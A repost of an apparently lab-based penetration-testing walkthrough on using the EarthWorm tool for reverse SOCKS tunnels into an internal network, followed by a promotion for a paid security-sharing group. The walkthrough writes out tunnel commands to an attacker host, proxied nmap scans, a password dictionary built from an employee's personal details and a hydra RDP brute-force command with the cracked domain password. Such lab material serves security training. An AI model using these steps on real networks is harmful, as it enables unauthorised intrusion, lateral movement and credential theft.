【内网渗透】EarthWorm隧道代理
原文链接: https://mp.weixin.qq.com/s?__biz=Mzk0Mzc1MTI2Nw==&mid=2247493486&idx=1&sn=ff2d6c728350d40d24c192736d74950a
【内网渗透】EarthWorm隧道代理
YueXuan 神农Sec 2025-07-18 01:00
扫码加圈子
获内部资料
网络安全领域各种资源,EDUSRC证书站挖掘、红蓝攻防、渗透测试等优质文章,以及工具分享、前沿信息分享、POC、EXP分享。
不定期分享各种好玩的项目及好用的工具,欢迎关注。加内部圈子,文末有彩蛋(知识星球优惠卷)。
文章作者:YueXuan
文章来源:https://www.freebuf.com/articles/system/438053.html
EarthWorm隧道代理
【实验目的】
通过在Windows服务器和Linux服务器使用EarthWorm隧道代理,进行横向扫描内网。
【知识点】
EarthWorm隧道代理
【实验原理】
EarthWorm(ew)是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,可在复杂网络环境下完成网络穿透。工具包中提供了多种可执行文件,以适用Linux、Windows、MacOS、Arm-Linux 等不同的操作系统。
【软件工具】
-
服务器:Windows Server 2008 1台;防火墙 1台;Kali Linux台;Centos 7 1台;Windows 10 1台;Windows 2016 1台;
-
交换机/路由:交换机 4台;路由器 1台;
-
软件:EarthWorm;
【实验拓扑】
【实验预期】
1.在Windows做反向隧道代理进行横向渗透。
2.在Linux做反向隧道代理进行横向渗透。
3.搜索关于内网主机的相关信息并爆破口令。
【实验步骤】
1.信息收集
(1)登录攻击机1-kali Linux
单击上方菜单栏中的【环境申请】按钮启动实验拓扑,选择拓扑图中左上方的【攻击机1-kali Linux】,按右键,在弹出的菜单中选择【控制台】,输入用户名密码root/com.1234,登录【攻击机1-kali Linux】界面,如下图所示。
右键桌面,弹出的菜单栏中选择【Open Terminal Here】,打开操作机终端,如下图所示。
输入以下命令并按回车,使用rdesktop命令远程目标服务器,并开启Kali Linux本机的共享目录,共享目录在根目录下的tools文件夹,最后使用800×600的分辨率,如下图所示。
rdesktop -u test -p Admin@123. 202.1.10.34 -r disk:h=/tools -g 800x600
注:由第六单元的子任务6.1.1添加用户,用户名为【test】,密码为【Admin@123.】。
当显示【Do you trust this certificate (yes/no)?】,输入yes并按回车,弹出目标服务器的远程桌面窗口,等待用户相关配置,至到进入桌面,如下图所示。
关闭该窗口,再次输入以下命令并按回车,如下图所示。
rdesktop -u test -p Admin@123. 202.1.10.34 -r disk:h=/tools -g 800x600
注:此步骤重新刷新kali linux 共享到目标主机的连接。
(2)发现10.0.18.22地址
单击任务栏上的【Windows 资源管理器】,依次双击【计算机】→【本地磁盘 C】,发现10.0.18.22快捷链接,双击【10.0.18.22】图标的文件,由此可发现10.0.18.22是个可疑的地址,如下图所示。
在桌面shift+右键,弹出菜单后选择【在此处打开命令提示符】,如下图所示。
使用ping命令尝试去ping这个内网地址,结果发现是可以ping通,该设备是存活的状态,如下图所示。
注:由于10.0.18.22是内网地址,外部攻击机无法直接去连接该内网地址,需通过隧道代理,代理到攻击机,才可进行下一步的渗透。
2.Windows隧道代理
(1)本地1080与8080做端口转发
回到【攻击机1-kali Linux】界面,再次新建终端输入以下命令并按回车,使用EarthWorm工具开启socks5代理由本地端口1080与8080做端口转发,如下图所示。
/tools/ew -s rcsocks -l 1080 -e 8080 &
使用vim命令创建并编辑/etc/proxychians4.conf文件,如下图所示。
按【i】键启用编辑模式,查看proxychians4.conf文件末尾处是否为socks5代理本地127.0.0.1的1080端口,如下图所示。
编辑完成后,按下【Esc】键,退出编辑模式,输入 【:wq!】 命令并按下回车键,保存并退出文件编辑模式,如下图所示。
(2)上传EarthWorm的Windows版
回到远程桌面窗口,依次双击【计算机】→【kali上的h系统文件夹】,进入Kali Linux本机的共享目录,并复制【ew.exe】到桌面,如下图所示。
(3)执行反向代理
再次新建命令提示符窗口,输入以下命令并按回车,使用EarthWorm工具做socks代理连接攻击机1-kali Linux的端口8080,如下图所示。
ew -s rssocks -d 67.220.91.30 -e 8080
(4)通过隧道代理使用NMAP扫描内网地址
回到【攻击机1-kali Linux】界面,新建终端输入以下命令并按回车,使用proxychians代理nmap工具绕过防火墙ICMP限制,并扫描指定范围的端口,如下图所示。
proxychains nmap -Pn -sT -p 21,22,23,25,80,135,139,445,3306,3389 10.0.18.22
注:需等待几分钟,因隧道代理减缓了nmap的扫描速度。
-Pn=指定绕过防防火墙,解除禁Ping
-sT=指定对TCP进行端口扫描
-p=指定端口范围
得出结果10.0.18.22存在端口有139、139、445三个端口,如下图所示。
3.Linux隧道代理
(1)本地1088与8088做端口转发
输入以下命令并按回车,使用EarthWorm工具开启socks5代理由本地端口1088与8088做端口转发,如下图所示。
/tools/ew -s rcsocks -l 1088 -e 8088 &
使用vim命令创建并编辑/etc/proxychians4.conf文件,如下图所示。
按【i】键启用编辑模式,在proxychians4.conf文件末尾处修改以下内容,使用socks5代理本地127.0.0.1的1088端口,如下图所示。
socks5 127.0.0.1 1088
编辑完成后,按下【Esc】键,退出编辑模式,输入 【:wq!】 命令并按下回车键,保存并退出文件编辑模式,如下图所示。
(2)上传EarthWorm的Linux版
新建Linux终端,输入以下命令并按回车,使用scp命令由根目录下的
tools
文件夹的ew文件至使用202.1.10.57的/bin目录,同时使用如下图所示。
scp /tools/ew [email protected]:/bin
注:由第六单元的6.2子任务,利用SUID方式提权添加test用户为root权限,密码为Com.1234。
输入以下命令并按下回车,远程连接目标服务器的SSH,202.1.10.57服务器ssh用户名为【test】,密码为【Com.1234】。如下图所示。
ssh [email protected]
(3)执行反向代理
输入以下命令并按下回车,使用chmod命令给予/bin目录下的ew文件执行权限,同时使用EarthWorm工具做socks代理连接攻击机1-kali Linux的端口8088,如下图所示。
ew -s rssocks -d 67.220.91.30 -e 8088
(4)通过隧道代理使用NMAP扫描内网地址
新建终端输入以下命令并按回车,使用proxychians代理nmap工具绕过防火墙ICMP限制,并扫描指定范围的端口,如下图所示。
proxychains nmap -Pn -sT -p 21,22,23,25,80,135,139,445,3306,3389 10.0.18.22
注:需等待几分钟,因隧道代理减缓了nmap的扫描速度。
-Pn=指定绕过防防火墙,解除禁Ping
-sT=指定对TCP进行端口扫描
-p=指定端口范围
得出结果10.0.18.22存在端口有139、139、445、3389四个端口,比windows多个3389端口,推测windows server限制由DMZ区访问内网的3389端口,而Linux server则未做该限制,如下图所示。
输入以下命令并按回车,使用proxychians代理rdesktop远程10.0.18.22,验证是否可正常访问RDP服务,如下图所示。
proxychains rdesktop 10.0.18.22
当显示【Do you trust this certificate (yes/no)?】,显示证书信息发现该内网主机为域用户,域名为【zhida.com】,计算机名为【jishu】,使用ctrl+z结束远程,如下图所示。
注:因不知域用户的账户和密码,需要继续进行信息搜索。
回到远程桌面窗口,在桌面新建命令提示符,进入命令提示符窗口后,输入以下命令并按回车,使用cd命令,进入administrator的桌面,如下图所示。
cd C:\Users\Administrator\Desktop
分别输入dir和【dir /a】命令并按回车,分别查看administrator桌面的文件,当使用【dir /a】命令时发现一个隐藏文件【xiaowang.conntact.lnk】,如下图所示。
注:dir /a为显示隐藏文件。
输入以下命令并按回车,使用xcopy命令,复制当前目录下的【xiaowang.contact.lnk】文件到test桌面下,如下图所示。
xcopy /h xiaowang.contact.lnk C:\Users\test\Desktop\
注:xcopy /h 复制具有隐藏文件和系统文件属性的文件。
在test用户下的桌面,再次新建命令提示符,输入以下命令并按回车,使用attrib命令去除【xiaowang.contact.lnk】文件隐藏属性,如下图所示。
attrib -h xiaowang.contact.lnk
注:使用attrib命令的-h参数指定文件去除文件隐藏属性。
双击打开【xiaowang.contact.lnk】文件,发现内容为运维测试人员的相关信息,如运维测试人员所属公司、姓名【xiaowang】、所属职务、电子邮箱为【[email protected]】和电话【8046732】,如下图所示。
单击【姓名和电子邮件】选项卡,除上述相关信息外,发现其中昵称可能为员工号【A0107】,如下图所示。
单击【工作】选项卡,该内容为运维测试人员的所属办公室【302】、所属部门【技术部】,其中所属部门【技术部】与发现远程连接10.0.18.22显示证书信息的计算机名为【jishu】相同,如下图所示。
注:猜测10.0.18.22内网机器可能为xiaowang用户。
准备字典内容,回到Linux终端输入以下命令并按下回车键,使用vim命令创建并编辑TestConn.php文件,如下图所示。
vim password.txt
对password.txt文件进行编辑添加相应的密码字典,按【i】键启用编辑模式,并输入以下密码组合,尝试对上述运维测试人员信息进行密码字典组合,如下图所示。
xiaowang
[email protected]
8046732
A0107
302
jishu
xiaowangjishubu
xiaowangA0107
xwA0107
XiaoWangZhida
xwzhida
Xiaowangzhida
Xwzhida
xiaowang@A0107.
Xw@A0107.
注:尝试进行密码组合,如:员工号+电话、姓名大小全拼+邮箱、姓名+集团名等等。
编辑完成后,按下【Esc】键,退出编辑模式,输入 【:wq!】 命令并按下回车键,保存并退出文件编辑模式,如下图所示。
输入以下命令并按回车,使用hydra工具进行暴力破解10.0.18.22的rdp,尝试使用域账户【[email protected]】去暴力破解域用户的密码,如下图所示。
proxychains hydra -l [email protected] -P password.txt 10.0.18.22 rdp
爆破后的结果为域账户【[email protected]】,域密码为【Xw@A0107.】,如下图所示。
输入以下命令并按回车,为了验证所爆破出的管理员口令是否正确,使用proxychians代理rdesktop远程10.0.18.22,如下图所示。
proxychains rdesktop -u [email protected] -p Xw@A0107. 10.0.18.22 -g 800x600
当显示【Do you trust this certificate (yes/no)?】,输入yes并按回车,弹出目标服务器的远程桌面窗口,等待用户相关配置,至到进入桌面,同时发现该主机为域用户,域名为zhida.com,如下图所示。
发现可成功远程目标机器,如下图所示。
【实验结论】
通过上述操作,分别通过在Windows服务器和Linux服务器使用隧道代理,进行横向扫描内网,爆破口令目标机器得出域账户和密码,了解并掌握如何使用EarthWorm隧道代理工具。
内部小圈子详情介绍
我们是
神农安全
,点赞 + 在看
铁铁们点起来,最后祝大家都能心想事成、发大财、行大运。
内部圈子介绍
圈子专注于更新src/红蓝攻防相关:
1、维护更新src专项漏洞知识库,包含原理、挖掘技巧、实战案例
2、知识星球专属微信“小圈子交流群”
3、微信小群一起挖洞
4、内部团队专属EDUSRC证书站漏洞报告
5、分享src优质视频课程(企业src/EDUSRC/红蓝队攻防)
6、分享src挖掘技巧tips
7、不定期有众测、渗透测试项目(一起挣钱)
8、不定期有工作招聘内推(工作/护网内推)
9、送全国职业技能大赛环境+WP解析(比赛拿奖)
内部圈子
专栏介绍
知识星球内部共享资料截屏详情如下
(只要没有特殊情况,每天都保持更新)
知识星球——
神农安全
星球现价
¥45元
如果你觉得应该加入,就不要犹豫,价格只会上涨,不会下跌
星球人数少于1000人 45元/年
星球人数少于1200人 65元/年
(新人优惠卷20,扫码或者私信我即可领取)
欢迎加入星球一起交流,券后价仅45元!!! 即将满1000人涨价
长期
更新,更多的0day/1day漏洞POC/EXP
内部知识库–
(持续更新中)
知识库部分大纲目录如下:
知识库跟
知识星球联动,基本上每天保持
更新,满足圈友的需求
知识库和知识星球有师傅们关注的
EDUSRC
和
CNVD相关内容(内部资料)
还有网上流出来的各种
SRC/CTF等课程视频
量大管饱,扫描下面的知识星球二维码加入即可
不会挖CNVD?不会挖EDURC?不会挖企业SRC?不会打nday和通杀漏洞?
直接加入我们小圈子:
知识星球+内部圈子交流群+知识库
快来吧!!
神农安全知识库内部配置很多
内部工具和资料💾,
玄机靶场邀请码+EDUSRC邀请码等等
快要护网来临,是不是需要
护网面试题汇总
?
问题+答案(超级详细🔎)
最后,师傅们也是希望找个
好工作,那么常见的
渗透测试/安服工程师/驻场面试题目,你值得拥有!!!
内部小圈子——
圈友反馈
(
良心价格
)
神农安全公开交流群
有需要的师傅们直接扫描文章二维码加入,然后要是后面群聊二维码扫描加入不了的师傅们,直接扫描文章开头的二维码加我(备注加群)
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.